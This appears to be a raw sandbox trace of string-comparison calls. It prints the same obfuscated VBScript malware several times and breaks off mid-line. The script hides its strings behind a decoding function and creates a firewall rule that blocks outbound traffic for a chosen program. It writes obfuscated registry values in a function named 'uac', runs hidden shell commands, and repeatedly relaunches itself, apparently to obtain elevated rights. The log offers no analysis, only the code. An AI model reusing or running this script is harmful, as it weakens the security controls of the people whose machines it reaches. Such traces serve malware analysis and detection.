bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 102 [0223.004] wcsncmp (_String1="tr1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 103 [0223.004] wcsncmp (_String1="r1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 101 [0223.004] wcsncmp (_String1="1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 36 [0223.004] wcsncmp (_String1=")) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 28 [0223.005] wcsncmp (_String1=") then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite 